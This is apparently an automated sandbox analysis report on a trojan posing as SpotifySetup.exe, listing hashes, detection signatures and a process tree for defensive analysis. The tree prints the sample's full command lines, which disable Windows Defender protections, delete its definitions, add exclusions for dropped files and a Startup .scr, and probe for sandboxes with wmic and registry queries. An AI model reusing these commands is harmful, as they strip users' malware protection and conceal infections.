Analysis

  • max time kernel
    209s
  • max time network
    206s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    21-06-2024 23:35

General

  • Target

    SpotifySetup.exe

  • Size

    6.8MB

  • MD5

    e58de2d31fe7a07e75f79e76ca79ba95

  • SHA1

    a918c93c009c84f98c055926da540558342be0df

  • SHA256

    b4579cb6e46b23c09e34d93fbd190e32ae7a407e5dedba99dcabcdd4b3acc7f1

  • SHA512

    ae6ebeb52c720c5e546bddbeacae2b72f19bdfe4fd21dbbf2b6d6fdfebb21eabfb752dc6f6b76cf365345f686668df290da80756f68d70757818aed49d23ade0

  • SSDEEP

    196608:ZRuyH1g16gQ49hoy6Enwc4GgpG0REtHIrq7LrtrbWOjgWyI:ZcXZWyotGgpGLtz7ntrbvMWyI

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • ACProtect 1.3x - 1.4x DLL software 16 IoCs

    Detects file using ACProtect software.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • UPX packed file 46 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe
    "C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3996
    • C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe
      "C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3308
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5032
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4784
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2236
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4932
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:548
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3708
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4572
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          PID:908
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4992
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2908
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1088
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2216
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4796
        • C:\Windows\SysWOW64\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
          PID:2660
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3280
        • C:\Windows\SysWOW64\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
          4⤵
          PID:3664
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2836
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic path win32_VideoController get name
          4⤵
          • Detects videocard installed
          • Suspicious use of AdjustPrivilegeToken
          PID:4304
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3484
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic path win32_VideoController get name
          4⤵
          • Detects videocard installed
          PID:3076
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
        3⤵
        PID:4668
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:2396
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:4712
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:1980

Network

MITRE ATT&CK Enterprise v15


Downloads
